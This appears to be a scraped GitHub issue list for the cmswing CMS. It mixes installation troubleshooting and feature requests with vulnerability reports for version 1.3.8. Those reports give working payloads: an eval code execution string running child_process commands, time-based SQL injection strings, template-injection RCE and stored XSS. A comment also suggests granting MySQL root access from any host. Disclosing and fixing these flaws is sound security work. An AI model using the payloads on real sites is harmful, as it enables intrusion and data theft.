arterli / cmswing
An e-commerce platform and CMS site builder (for PC, mobile and the WeChat Official Account platform) built on Egg.js (born for enterprise-grade frameworks and applications), Sequelize and GraphQL
Home Page: http://www.cmswing.com
License: Other
It seems there is no issue with npm start. But I am unable to forward to http://127.0.0.1:8360.
[2018-03-23T05:14:51.131] [11064] [INFO] - Server running at http://127.0.0.1:8360
[2018-03-23T05:14:51.134] [11064] [INFO] - ThinkJS version: 3.2.7
[2018-03-23T05:14:51.134] [11064] [INFO] - Enviroment: development
[2018-03-23T05:14:51.134] [11064] [INFO] - Workers: 4
[2018-03-23T05:14:53.017] [3464] [INFO] - mysql://root:[email protected]:3306/cmswing
[2018-03-23T05:14:53.061] [3464] [INFO] - SQL: SELECT `name`,`value`,`type` FROM `cmswing_setup` WHERE ( `status` = 1 ) ORDER BY sort ASC, Time: 43ms
[2018-03-23T05:14:53.064] [2788] [INFO] - mysql://root:[email protected]:3306/cmswing
[2018-03-23T05:14:53.065] [3464] [INFO] - SQL: SELECT * FROM `cmswing_ext`, Time: 2ms
[2018-03-23T05:14:53.104] [2788] [INFO] - SQL: SELECT `name`,`value`,`type` FROM `cmswing_setup` WHERE ( `status` = 1 ) ORDER BY sort ASC, Time: 39ms
[2018-03-23T05:14:53.107] [2788] [INFO] - SQL: SELECT * FROM `cmswing_ext`, Time: 1ms
[2018-03-23T05:14:53.221] [15348] [INFO] - mysql://root:[email protected]:3306/cmswing
[2018-03-23T05:14:53.259] [15348] [INFO] - SQL: SELECT `name`,`value`,`type` FROM `cmswing_setup` WHERE ( `status` = 1 ) ORDER BY sort ASC, Time: 37ms
[2018-03-23T05:14:53.262] [15348] [INFO] - SQL: SELECT * FROM `cmswing_ext`, Time: 2ms
[2018-03-23T05:14:53.269] [6712] [INFO] - mysql://root:[email protected]:3306/cmswing
[2018-03-23T05:14:53.304] [6712] [INFO] - SQL: SELECT `name`,`value`,`type` FROM `cmswing_setup` WHERE ( `status` = 1 ) ORDER BY sort ASC, Time: 35ms
[2018-03-23T05:14:53.307] [6712] [INFO] - SQL: SELECT * FROM `cmswing_ext`, Time: 1ms
[2018-03-23T05:14:55.779] [17696] [INFO] - mysql://root:[email protected]:3306/cmswing
[2018-03-23T05:14:55.816] [17696] [INFO] - SQL: SELECT `name`,`value`,`type` FROM `cmswing_setup` WHERE ( `status` = 1 ) ORDER BY sort ASC, Time: 36ms
[2018-03-23T05:14:55.819] [17696] [INFO] - SQL: SELECT * FROM `cmswing_ext`, Time: 2ms
[2018-03-23T05:15:00.014] [2788] [INFO] - SQL: SELECT `id` FROM `cmswing_order` WHERE ( `pay_status` = 0 ) AND ( `status` = 2 ) AND ( `create_time` < 1521666900011 ) AND ( `type` = 0 ), Time: 2ms
[2018-03-23T05:15:00.017] [2788] [INFO] - CLI admin/crontab/cloa 200 8ms
global.encryptPassword = function(password, md5encoded) {
md5encoded = md5encoded || false;
password = md5encoded ? password : think.md5(password);
return think.md5(think.md5('www.cmswing.com') + password + think.md5('Arterli'));
};
A code execution vulnerability was found in cmswing version 1.3.8; details can be found in the analysis below.
The vulnerability lies in the log function in cmswing/src/mode/action.js
async log(action, model, record_id, user_id, ip, url) {
// action=action||null,model=model||null,record_id=record_id||null,user_id=user_id||null;
// Parameter check
if (think.isEmpty(action) || think.isEmpty(model) || think.isEmpty(record_id)) {
return '参数不能为空';
}
if (think.isEmpty(user_id)) {
const user = await think.session('userInfo');
const id = user.id;
user_id = id;
}
// Look up the action and decide whether to proceed
const action_info = await this.where({name: action}).find();
if (action_info.status != 1) {
return '该行为被禁用';
}
// Insert the action log
const data = {
action_id: action_info.id,
user_id: user_id,
action_ip: _ip2int(ip),
model: model,
record_id: record_id,
create_time: new Date().valueOf()
};
data.remark = '';
// Parse the log rule and generate the log remark
if (!think.isEmpty(action_info.log)) {
const match = action_info.log.match(/\[(\S+?)\]/g);
if (!think.isEmpty(match)) {
const log = {
user: user_id,
record: record_id,
model: model,
time: new Date().valueOf(),
data: {
user: user_id,
record: record_id,
model: model,
time: new Date().valueOf()
}
};
const replace = [];
for (let val of match) {
val = val.replace(/(^\[)|(\]$)/g, '');
const param = val.split('|');
console.log(1111111,param);
if (!think.isEmpty(param[1])) {
if (param[0] == 'user') {
replace.push(await call_user_func(param[1], log[param[0]]));
} else {
replace.push(call_user_func(param[1], log[param[0]]));
}
} else {
replace.push(log[param[0]]);
}
}
data.remark = str_replace(match, replace, action_info.log);
// console.log(data.remark)
} else {
data.remark = action_info.log;
}
} else {
// No log rule defined; record the request URL
data.remark = '操作url:' + url;
}
if (!think.isNumber(record_id)) {
data.record_id = 0;
}
await this.model('action_log').add(data);
if (!think.isEmpty(action_info.rule)) {
const rules = await this.parse_action(action, user_id);
// console.log(rules);
const res = await this.execute_action(rules, action_info.id, user_id);
}
}
......
global.call_user_func = function(cb, params) {
const func = eval(cb);
if (!think.isArray(params)) {
params = [params];
}
return func.apply(cb, params);
};
The variable log is the user behavior log data transmitted by the front end. The log function processes the variable log. If param[0] == 'user', the call_user_func function is called. The variable is not checked, so malicious parameters lead to the eval in call_user_func and thus to code execution.
Local Test
Enter the system backend, select user behavior, and add our payload to the action rules
Add an article to trigger the user behavior just defined.
Execution log: the code was executed successfully and the IP-related information was printed out
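As an added example (not cmswing's code), the placeholder expansion from log() re-implemented with a fixed registry in place of call_user_func's eval. Note that both branches of the `if (param[0] == 'user')` test above reach call_user_func (the only difference is the await), so any `[field|...]` placeholder whose formatter text is arbitrary JavaScript is evaluated. The formatter names in the registry and the sample context are constructed for this example.

```javascript
// Added example, not cmswing's own code. Re-implements the placeholder
// expansion from log() with a fixed registry of formatter names in place
// of call_user_func's eval. Registry entries and the sample context are
// constructed for this example; the project's real helpers are not used.
const FORMATTERS = {
  get_nickname: (uid) => `user#${uid}`,   // hypothetical stand-in
  upper: (s) => String(s).toUpperCase(),   // hypothetical stand-in
};

// Replacement for call_user_func: the name must be a key of FORMATTERS,
// so "[user|console.log(require('child_process')...)]" never runs.
function safeCallUserFunc(name, params) {
  if (!Object.prototype.hasOwnProperty.call(FORMATTERS, name)) {
    throw new Error(`formatter not allowed: ${name}`);
  }
  const args = Array.isArray(params) ? params : [params];
  return FORMATTERS[name](...args);
}

// Same placeholder grammar as action_info.log: "[field]" or "[field|formatter]",
// matched with the original /\[(\S+?)\]/g and split on "|".
function renderLogRule(rule, ctx) {
  const tokens = rule.match(/\[(\S+?)\]/g) || [];
  let out = rule;
  for (const token of tokens) {
    const [field, fn] = token.replace(/(^\[)|(\]$)/g, '').split('|');
    if (!Object.prototype.hasOwnProperty.call(ctx, field)) {
      throw new Error(`unknown field: ${field}`);
    }
    const value = fn ? safeCallUserFunc(fn, ctx[field]) : ctx[field];
    out = out.split(token).join(String(value));
  }
  return out;
}
```

The rule text still comes from the admin form, but the only thing it can choose is which registered formatter runs and on which of the fixed context fields.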
The first XSS vulnerability
Question-and-answer module. In the question supplement function, when inserting a link, filling "> < SVG / onload = alert ('xss') > <! -- into the address field forms a stored XSS. The vulnerability is triggered when any visitor views the question.
The second XSS vulnerability
A stored XSS exists in the title field of the online submission module; the payload is <script>alert (1)</script>
The specific location of the vulnerability is shown in the figure below. After the submission is approved by the admin user, the vulnerability is triggered when the administrator opens the content management page.
thinkjs -V shows 2.2.8
After running, it cannot connect to the database and reports an error.
A code execution vulnerability was found in cmswing version 1.3.8; details can be found in the analysis below.
Vulnerability Location
The vulnerability lies in the rechargeAction function in cmswing/src/controller/admin/user.js
async rechargeAction() {
if (this.isAjax('POST')) {
const data = this.post();
const self = this;
const insertId = await this.db.transaction(async() => {
await self.db.where({id: data.id}).increment('amount', data.balance);
const amount_log = await self.db.where({id: data.id}).getField('amount', true);
return await self.model('balance_log').db(self.db.db()).add({
admin_id: self.user.uid,
user_id: data.id,
type: 2,
time: new Date().valueOf(),
amount: data.balance,
amount_log: amount_log,
note: `管理员(${await get_nickname(self.user.uid)})为您充值,充值的金额为:${data.balance} 元`
});
});
if (insertId) {
return this.success({name: '充值成功!'});
} else {
return this.fail('充值失败!');
}
} else {
const id = this.get('ids');
const name = await get_nickname(id);
this.assign('name', name);
this.assign('id', id);
this.meta_title = '会员充值';
return this.display();
}
}
The variable data.balance represents the recharge amount. The function rechargeAction increases the specified user's balance by that amount but lacks sufficient checks on data.balance, which results in SQL injection when the database update is performed.
Local Test
Enter the system backend and select user recharge
Modify the balance to (select if(left(version(),1)=5,sleep(5),sleep(10))). The recharge succeeded and the response time was extended by 5 seconds, proving that our statement was injected into the database and executed.
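An added example (not cmswing's code) of the check the recharge handler needs. The first function mimics an increment that pastes its step argument into the statement as text (an assumed shape, constructed for the example, not think-model's implementation); the second admits only a plain decimal amount; the third combines that with placeholders so neither the amount nor the id ever becomes part of the statement text.

```javascript
// Added example, not cmswing's own code. naiveIncrementSql mimics an
// increment() that pastes its step argument into the statement as text
// (an assumed shape, constructed here; not think-model's implementation).
// parseAmount / safeIncrementSql show the check the recharge handler lacks.
function naiveIncrementSql(table, id, field, step) {
  return `UPDATE \`${table}\` SET \`${field}\` = \`${field}\` + ${step} WHERE id = ${id}`;
}

// Accepts a plain decimal amount with at most two decimals ("10", "10.50",
// "0.01") and returns it in integer cents. Everything else, including the
// (select if(...sleep(5)...)) payload from the report, is rejected.
function parseAmount(raw, maxCents = 100000000) {
  const s = String(raw).trim();
  if (!/^\d{1,9}(\.\d{1,2})?$/.test(s)) throw new Error(`invalid amount: ${s}`);
  const cents = Math.round(Number(s) * 100);
  if (cents <= 0 || cents > maxCents) throw new Error(`amount out of range: ${s}`);
  return cents;
}

// Validated amount and id, passed as placeholders so neither becomes SQL text.
// table and field are developer constants here, never request input.
function safeIncrementSql(table, rawId, field, rawAmount) {
  const id = Number(rawId);
  if (!Number.isInteger(id) || id <= 0) throw new Error(`invalid id: ${rawId}`);
  const cents = parseAmount(rawAmount);
  return {
    sql: `UPDATE \`${table}\` SET \`${field}\` = \`${field}\` + ? WHERE \`id\` = ?`,
    values: [cents / 100, id],
  };
}
```

The regex is deliberately narrower than Number(): it refuses exponents, signs, whitespace and anything non-numeric, which is what turns the time-based payload into a validation error instead of a query.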
table:member|field:score|condition:id=${self} AND (select if(substr(version(),1)>0,sleep(5),1))|rule:1
Setting a recommendation position has no effect on the front-end page. In the backend the recommendation position was set to list recommendation and the template has position='1', but the front-end display did not change. Going back to edit, the recommendation position just set is no longer selected.
Preliminary analysis: in the development environment, code changes restart the system; adding a model deletes the files under the model directory, which restarts the service and causes the error.
[user|console.log(require('child_process').execSync('ipconfig').toString('utf-8'))]
or [user|console.log(require('child_process').execSync('calc').toString('utf-8'))]
Template injection src/controller/admin/template.js
/**
 * Site home page template editor
 * @returns {*}
 */
async homeAction() {
const gid = await this.model('temp_group').where({isdefault: 1}).getField('gid', true);
const map = {
module: 'home',
controller: 'index',
action: 'index',
type: this.para('type') || 1,
gid: gid
};
const temp = await this.model('temp').where(map).find();
let temppath;
if (temp.type == 2) {
temppath = `${think.ROOT_PATH}/view/${temp.module}/mobile/`;
} else {
temppath = `${think.ROOT_PATH}/view/${temp.module}/`;
}
const templateFile = `${temppath}${temp.controller}${this.config('view.nunjucks.sep')}${temp.action}${this.config('view.nunjucks.extname')}`;
if (this.isPost) {
const data = this.post();
data.id = temp.id;
data.module = map.module;
data.controller = map.container;
data.action = map.action;
data.name = temp.name;
data.type = temp.type;
data.gid = temp.gid;
console.log(data);
// await this.model("temp").add(data);
temp.pid = temp.id;
delete temp.id;
temp.baktime = new Date().getTime();
temp.lastuser = this.user.uid;
console.log(temp);
// return false;
// Back up before modifying
if (data.html != temp.html) {
const bak = await this.model('temp_bak').add(temp);
const res = await this.model('temp').update(data);
if (!think.isEmpty(res)) {
fs.writeFileSync(templateFile, data.html);
return this.success({name: '添加成功!'});
}
} else {
return this.fail('请先修改模板!');
}
} else {
// Home page editor
// console.log(this.adminmenu["10"]);
this.meta_title = '首页模板';
if (think.isFile(templateFile)) {
const tempcon = fs.readFileSync(templateFile, 'utf8');
temp.html = tempcon;
}
// console.log(temp);
this.assign('temp', temp);
return this.display();
}
}
As can be seen, the front end is rendered through nunjucks templates, and the html parameter of the incoming POST request is only checked for emptiness, so command execution can be achieved through template injection for RCE; construct a call to child_process directly. Here we demonstrate by popping a calculator
Then visit the home page to trigger rendering
The calculator pops up successfully; other templates have the same problem
I want to build a small site where residents of a community can buy and sell second-hand goods with each other. I am only just starting with JavaScript. How hard would it be to add a feature to your template that lets users post product listings? Thanks!
How to support HTTPS?
Updating one field of a record and incrementing another field can be done in a single statement
For example
In autoLogin of common/model/member.js
let data = {
'last_login_time': new Date().valueOf(),
'last_login_ip': _ip2int(ip),
};
let use = await this.where({id: user.id}).update(data);
await this.where({id: user.id}).increment('login');
can be changed to
let field = 'login';
let data = {
last_login_time: new Date().valueOf(),
last_login_ip:_ip2int(ip),
[field]: ['exp', `\`${field}\`+1`],
};
await this.where({ id: user.id }).update(data);
test1
As the title says, there have been no updates for a whole year
I plan to write the front-end pages with vue.js. Is there a REST API endpoint available to call?
2023-03-16 16:55:34,849 INFO 17284 egg-sequelize Executed (default): SHOW INDEX FROM sys_models_associate
FROM meng_da
2023-03-16 16:55:34,863 INFO 12492 [egg-sequelize] Not overriding built-in method from model attribute: where
2023-03-16 16:55:34,866 INFO 12492 [egg-sequelize] Not overriding built-in method from model attribute: where
2023-03-16 16:55:34,867 INFO 12492 [egg-sequelize] Not overriding built-in method from model attribute: where
2023-03-16 16:55:34,869 ERROR 12492 nodejs.TypeError: Cannot read properties of undefined (reading 'hasMany')
at Function.SysUser.associate (F:\workspace\mine\mengda-official-site\app\model\sys_user.js:22:31)
at F:\workspace\mine\mengda-official-site\node_modules\egg-sequelize\lib\loader.js:118:54
at Array.forEach ()
at loadDatabase (F:\workspace\mine\mengda-official-site\node_modules\egg-sequelize\lib\loader.js:117:12)
at F:\workspace\mine\mengda-official-site\node_modules\egg-sequelize\lib\loader.js:35:22
at Array.forEach ()
at module.exports (F:\workspace\mine\mengda-official-site\node_modules\egg-sequelize\lib\loader.js:34:24)
at module.exports (F:\workspace\mine\mengda-official-site\node_modules\egg-sequelize\app.js:4:26)
at Hook.configDidLoad (F:\workspace\mine\mengda-official-site\node_modules\egg-core\lib\lifecycle.js:99:9)
at Lifecycle.triggerConfigDidLoad (F:\workspace\mine\mengda-official-site\node_modules\egg-core\lib\lifecycle.js:154:14)
pid: 12492
hostname: DESKTOP-559IHRU
F:\workspace\mine\mengda-official-site\node_modules\egg-cluster\lib\app_worker.js:32
throw err;
^
TypeError: Cannot read properties of undefined (reading 'hasMany')
at Function.SysUser.associate (F:\workspace\mine\mengda-official-site\app\model\sys_user.js:22:31)
at F:\workspace\mine\mengda-official-site\node_modules\egg-sequelize\lib\loader.js:118:54
at Array.forEach ()
at loadDatabase (F:\workspace\mine\mengda-official-site\node_modules\egg-sequelize\lib\loader.js:117:12)
at F:\workspace\mine\mengda-official-site\node_modules\egg-sequelize\lib\loader.js:35:22
at Array.forEach ()
at module.exports (F:\workspace\mine\mengda-official-site\node_modules\egg-sequelize\lib\loader.js:34:24)
at module.exports (F:\workspace\mine\mengda-official-site\node_modules\egg-sequelize\app.js:4:26)
at Hook.configDidLoad (F:\workspace\mine\mengda-official-site\node_modules\egg-core\lib\lifecycle.js:99:9)
at Lifecycle.triggerConfigDidLoad (F:\workspace\mine\mengda-official-site\node_modules\egg-core\lib\lifecycle.js:154:14)
[2023-03-16 16:55:34.877] [cfork:master:15552] worker:12492 disconnect (exitedAfterDisconnect: false, state: disconnected, isDead: false, worker.disableRefork: true)
[2023-03-16 16:55:34.877] [cfork:master:15552] don't fork, because worker:12492 will be kill soon
2023-03-16 16:55:34,878 INFO 15552 [master] app_worker#3:12492 disconnect, suicide: false, state: disconnected, current workers: ["2","3"]
2023-03-16 16:55:34,881 INFO 17284 egg-sequelize Executed (default): SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE' AND TABLE_NAME = 'sys_models_fields' AND TABLE_SCHEMA = 'meng_da'
[2023-03-16 16:55:34.895] [cfork:master:15552] worker:12492 exit (code: 1, exitedAfterDisconnect: false, state: dead, isDead: true, isExpected: false, worker.disableRefork: true)
[2023-03-16 16:55:34.896] [cfork:master:15552] worker:17284 disconnect (exitedAfterDisconnect: true, state: disconnected, isDead: false, worker.disableRefork: false)
[2023-03-16 16:55:34.897] [cfork:master:15552] don't fork new work (refork: false)
2023-03-16 16:55:34,897 INFO 15552 [master] app_worker#2:17284 disconnect, suicide: true, state: disconnected, current workers: ["4"]
9233 closed
2023-03-16 16:55:34,906 WARN 6356 [ClusterClient:Connection] socket is closed by other side while there were still unhandled data in the socket buffer
Debugger listening on ws://127.0.0.1:9233/a1e69dcb-56d5-448f-adb6-d44326a89222
For help, see: https://nodejs.org/en/docs/inspector
[2023-03-16 16:55:34.927] [cfork:master:15552] worker:17284 exit (code: null, exitedAfterDisconnect: true, state: dead, isDead: true, isExpected: true, worker.disableRefork: false)
2023-03-16 16:55:35,816 INFO 9832 [RemoteConfig] loading remote config from F:\workspace\mine\mengda-official-site\run\remote_config.json
9233 opened
Steps:
1 Configured everything per the docs; ip+8360 is accessible normally, e.g. http://127.0.0.1:8360
2: Following https://www.cmswing.com/p/404.html
configured nginx, saved as shop.conf and symlinked it
include shop.conf;
nginx -t reports no problems; restarted
3: Visiting the domain http://xxx.com/index.js gives a 404
My shop.conf
server {
listen 80;
server_name www.mygame.com;
root /home/wwwroot/default;
set $node_port 8360;
index index.js index.html index.htm;
if ( -f $request_filename/index.html ){
rewrite (.*) $1/index.html break;
}
if ( !-f $request_filename ){
rewrite (.*) /index.js;
}
location = /index.js {
proxy_http_version 1.1;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Host $http_host;
proxy_set_header X-NginX-Proxy true;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_pass http://127.0.0.1:$node_port$request_uri;
proxy_redirect off;
}
location ~ /static/ {
etag on;
expires max;
}
}
/home/ubuntu/CmsWing-1.1.0/src/config/adapter/view.js:213
env.addFilter("getmodelfield", async(id, model_id, field, callback) => {
^
SyntaxError: Unexpected token (
at createScript (vm.js:56:10)
at Object.runInThisContext (vm.js:97:10)
at Module._compile (module.js:542:28)
at Object.Module._extensions..js (module.js:579:10)
at Module.load (module.js:487:32)
at tryModuleLoad (module.js:446:12)
at Function.Module._load (module.js:438:3)
at Module.require (module.js:497:17)
at require (internal/module.js:20:19)
at Object. (/home/ubuntu/CmsWing-1.1.0/src/config/adapter.js:51:16)
at Module._compile (module.js:570:32)
at Object.Module._extensions..js (module.js:579:10)
at Module.load (module.js:487:32)
at tryModuleLoad (module.js:446:12)
at Function.Module._load (module.js:438:3)
at Module.require (module.js:497:17)
Windows 10
node 14.9.3
$ npm run dev
[email protected] dev D:\playtime\CmsWing
egg-bin dev
[egg-ts-helper] create typings\app\extend\context.d.ts (3ms)
[egg-ts-helper] create typings\app\extend\helper.d.ts (5ms)
[egg-ts-helper] create typings\app\controller\index.d.ts (4ms)
[egg-ts-helper] create typings\app\middleware\index.d.ts (3ms)
[egg-ts-helper] create typings\app\model\index.d.ts (5ms)
[egg-ts-helper] create typings\config\index.d.ts (26ms)
[egg-ts-helper] create typings\config\plugin.d.ts (1ms)
[egg-ts-helper] create typings\app\service\index.d.ts (2ms)
[egg-ts-helper] create typings\app\index.d.ts (1ms)
2022-11-08 00:04:33,981 INFO 8392 [master] node version v14.19.3
2022-11-08 00:04:33,982 INFO 8392 [master] egg version 3.3.3
2022-11-08 00:04:35,242 INFO 14168 [egg-sequelize] Not overriding built-in method from model attribute: where
2022-11-08 00:04:35,271 INFO 14168 [egg-sequelize] Not overriding built-in method from model attribute: where
2022-11-08 00:04:35,274 INFO 14168 [egg-sequelize] Not overriding built-in method from model attribute: where
2022-11-08 00:04:35,393 ERROR 14168 nodejs.Error: Body must be a string. Received: undefined.
at devAssert (D:\playtime\CmsWing\node_modules\graphql\jsutils\devAssert.js:12:11)
at new Source (D:\playtime\CmsWing\node_modules\graphql\language\source.js:32:32)
at new Parser (D:\playtime\CmsWing\node_modules\graphql\language\parser.js:98:9)
at Object.parse (D:\playtime\CmsWing\node_modules\graphql\language\parser.js:31:18)
at Object. (D:\playtime\CmsWing\node_modules\graphql-tools\dist\stitching\introspectSchema.js:40:42)
at Module._compile (internal/modules/cjs/loader.js:1085:14)
at Object.Module._extensions..js (internal/modules/cjs/loader.js:1114:10)
at Module.load (internal/modules/cjs/loader.js:950:32)
at Function.Module._load (internal/modules/cjs/loader.js:790:12)
at Module.require (internal/modules/cjs/loader.js:974:19)
[Intervention] Unable to preventDefault inside passive event listener due to target being treated as passive. See <URL>
addEvent("mousewheel", wheel);
change to addEvent("mousewheel", wheel, {passive: false});
This seems to fix it. I barely got it running on cloud9, but I am really not familiar with this system and have zero node.js knowledge; please add framework-related documentation. @arterli
You need to grant privileges in SQL
grant all privileges on *.* to 'root'@'192.168.0.103' identified by '123456';
If you log in locally, then:
grant all privileges on *.* to 'root'@'localhost' identified by '123456';
Of course you can also simply use:
grant all privileges on *.* to 'root'@'%' identified by '123456';
which allows root login from all IPs.
If the grant succeeds, you will see a Query OK prompt.
Then:
flush privileges;
This refreshes the grants; without it the grant may not take effect immediately.
exit;
This exits.
Reference https://blog.csdn.net/qq_36735409/article/details/78032144
When setting up WeChat auto-reply with text content, line breaks do not work: <br> is printed literally and \n does not work either
For example, for video covers I would like a note prompting the image width and height to upload
whereas image and article covers can be uploaded at any size
SyntaxError: Invalid or unexpected token
at new Script (vm.js:79:7)
at createScript (vm.js:251:10)
at Object.runInThisContext (vm.js:303:10)
at Module._compile (internal/modules/cjs/loader.js:657:28)
at Object.Module._extensions..js (internal/modules/cjs/loader.js:700:10)
at Module.load (internal/modules/cjs/loader.js:599:32)
at tryModuleLoad (internal/modules/cjs/loader.js:538:12)
at Function.Module._load (internal/modules/cjs/loader.js:530:3)
at Module.require (internal/modules/cjs/loader.js:637:17)
at require (internal/modules/cjs/helpers.js:22:18)
As in the title: after deleting a product, the shopping cart throws an error
After deleting it while logged in as admin, I can no longer log in with my QQ account. Presumably the QQ-related information was not deleted from the database, leaving the data inconsistent.
test
package.json says MIT, but could a LICENSE file be placed in the root directory?
A code execution vulnerability was found in cmswing version 1.3.8; details can be found in the analysis below.
Vulnerability Location
The vulnerability lies in the updateAction function in cmswing/src/controller/admin/action.js
async updateAction() {
const data = this.post();
if (think.isEmpty(data.id)) {
data.status = 1;
data.update_time = Date.now();
const res = await this.model('action').add(data);
if (res) {
this.success({name: '新增成功!', url: '/admin/action/index'});
} else {
this.fail('添加失败!');
}
} else {
data.update_time = Date.now();
const res = await this.model('action').update(data);
if (res) {
this.success({name: '更新成功!', url: '/admin/action/index'});
} else {
this.fail('更新失败!');
}
}
}
The variable data is the user behavior data transmitted by the front end. The function updateAction updates the user behavior using data. Due to the lack of data checking, SQL injection exists. When a user triggers the corresponding behavior, for example adding an article, the SQL statement is executed.
Local Test
Enter the system backend, select user behavior, and add our payload to the action rules
Add an article to trigger the user behavior just defined. The SQL statement executes successfully and the response time exceeds 5 seconds.
Database Execution Log
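An added example (not cmswing's code) of validating an action rule before it is stored by updateAction or consumed by execute_action. It assumes the `key:value|key:value` grammar of the rule shown earlier on this page (`table:member|field:score|condition:...|rule:...`) and that execute_action turns such a rule into an UPDATE, which is how the `condition` text reaches SQL. Only a `column=${self}` condition and a numeric or `field+N` / `field-N` rule are accepted; the parameterised statement shape is constructed here for illustration.

```javascript
// Added example, not cmswing's own code. Parses and validates an action
// rule string before it is stored or executed. The grammar and the UPDATE
// shape are assumptions based on the one rule shown on this page.
const IDENT = /^[A-Za-z_][A-Za-z0-9_]*$/;

function parseActionRule(ruleStr) {
  const rule = {};
  for (const seg of String(ruleStr).split('|')) {
    const idx = seg.indexOf(':');
    if (idx < 1) throw new Error(`malformed segment: ${seg}`);
    rule[seg.slice(0, idx).trim()] = seg.slice(idx + 1).trim();
  }
  return rule;
}

function validateActionRule(rule) {
  for (const k of ['table', 'field', 'condition', 'rule']) {
    if (!(k in rule)) throw new Error(`missing key: ${k}`);
  }
  if (!IDENT.test(rule.table)) throw new Error(`bad table: ${rule.table}`);
  if (!IDENT.test(rule.field)) throw new Error(`bad field: ${rule.field}`);
  // Only "<column>=${self}" is allowed; anything appended (AND ..., subselects) is rejected.
  const cond = /^([A-Za-z_][A-Za-z0-9_]*)=\$\{self\}$/.exec(rule.condition);
  if (!cond) throw new Error(`bad condition: ${rule.condition}`);
  // rule is either a literal number or "<field>+N" / "<field>-N" on the same field.
  const expr = /^(?:(\d+)|([A-Za-z_][A-Za-z0-9_]*)([+-])(\d+))$/.exec(rule.rule);
  if (!expr) throw new Error(`bad rule: ${rule.rule}`);
  if (expr[2] !== undefined && expr[2] !== rule.field) {
    throw new Error(`rule must use field ${rule.field}`);
  }
  return {
    table: rule.table,
    field: rule.field,
    column: cond[1],
    literal: expr[1] !== undefined ? Number(expr[1]) : null,
    op: expr[3] || null,
    delta: expr[4] !== undefined ? Number(expr[4]) : null,
  };
}

// Builds the statement with placeholders; identifiers come only from the
// validated rule, values only from the argument list.
function buildActionUpdate(ruleStr, userId) {
  const r = validateActionRule(parseActionRule(ruleStr));
  if (!Number.isInteger(userId)) throw new Error('userId must be an integer');
  const set = r.literal !== null
    ? `\`${r.field}\` = ?`
    : `\`${r.field}\` = \`${r.field}\` ${r.op} ?`;
  return {
    sql: `UPDATE \`${r.table}\` SET ${set} WHERE \`${r.column}\` = ?`,
    values: [r.literal !== null ? r.literal : r.delta, userId],
  };
}
```

Run the validation at save time in updateAction as well as at execution time: a rule that was accepted into the database under an older, looser check is otherwise still executed later.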
In the backend, Model management -> Add model -> the addAction() action seems to be missing the logic that creates the database table; please confirm
When I try WeChat scan-to-login it redirects to https://localhost/connect/qrconnect?...
instead of https://open.qq.com/connect/qrconnect?...
Visiting http://127.0.0.1:8360/admin gives a 404 error!
NotFoundError: url /admin not found.
[2017-08-11 10:15:55] [HTTP] GET /admin/public/signin 200 269ms
{ success: 1,
challenge: '1560f1dd2e523f6f9263fa24a502a5d2',
gt: '4dad8be53801fa4e2e50c1be078e2187' }
[2017-08-11 10:15:55] [HTTP] GET /admin/public/geetest?t=1502417755542 200 409ms
[2017-08-11 10:18:04] [HTTP] POST /admin/public/signin 200 120033ms
This CMS is awesome. Is there a language translation file?
After uploading an image in the rich-text editor it becomes
<img data-mce-src="public/xxx/xxx.jpg">
This relative path works under 127.0.0.1:7001/admin
but on front-end pages such as http://127.0.0.1:7001/cms/detail/1
it is wrong
For now I have worked around it at app/controller/cms/doc.js:getContent:266
by adding tinymce options to obj.options for type input-rich-text that switch to absolute paths
obj.type = 'input-rich-text';
obj.receiver = {
method: 'post',
url: '/upload/adminToken',
headers: {
resBody: '{"link":"{{url}}"}',
},
};
obj.options = {
height: 600,
relative_urls: false,
remove_script_host: false,
convert_urls: true,
document_base_url: '/',
codesample_languages: [
{ text: 'HTML', value: 'html' },
{ text: 'JavaScript', value: 'javascript' },
{ text: 'CSS', value: 'css' },
{ text: 'json', value: 'json' },
{ text: 'graphql', value: 'graphql' },
{ text: 'bash', value: 'bash' },
{ text: 'git', value: 'git' },
{ text: 'markdown', value: 'markdown' },
{ text: 'sql', value: 'sql' },
{ text: 'typescript', value: 'typescript' },
],
content_css: '/public/sys/prism.css',
};
When registering, I used a string as long as [email protected] and got an error
with no message; later I looked at the backend logs
m','18819448261',1565861057993,0,1), Time: 5ms
{ Error: ER_DATA_TOO_LONG: Data too long for column 'username' at row 1
at Query.Sequence._packetToError (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@mysql/lib/protocol/sequences/Sequence.js:47:14)
at Query.ErrorPacket (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@mysql/lib/protocol/sequences/Query.js:77:18)
at Protocol._parsePacket (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@mysql/lib/protocol/Protocol.js:291:23)
at Parser._parsePacket (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@mysql/lib/protocol/Parser.js:433:10)
at Parser.write (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@mysql/lib/protocol/Parser.js:43:10)
at Protocol.write (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@mysql/lib/protocol/Protocol.js:38:16)
at Socket.<anonymous> (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@mysql/lib/Connection.js:91:28)
at Socket.<anonymous> (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@mysql/lib/Connection.js:525:10)
at Socket.emit (events.js:189:13)
at addChunk (_stream_readable.js:284:12)
at readableAddChunk (_stream_readable.js:265:11)
at Socket.Readable.push (_stream_readable.js:220:10)
at TCP.onStreamRead [as onread] (internal/stream_base_commons.js:94:17)
--------------------
at Protocol._enqueue (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@mysql/lib/protocol/Protocol.js:144:48)
at PoolConnection.query (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@mysql/lib/Connection.js:201:25)
at Promise (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@think-helper/index.js:83:10)
at new Promise (<anonymous>)
at args (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@think-helper/index.js:82:12)
at ThinkMysql.[think-mysql-query] (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@think-mysql/index.js:169:12)
at getConnection.then.connection (/Users/macbook/Downloads/CmsWing/node_modules/[email protected]@think-mysql/index.js:247:25)
at process._tickCallback (internal/process/next_tick.js:68:7)
code: 'ER_DATA_TOO_LONG',
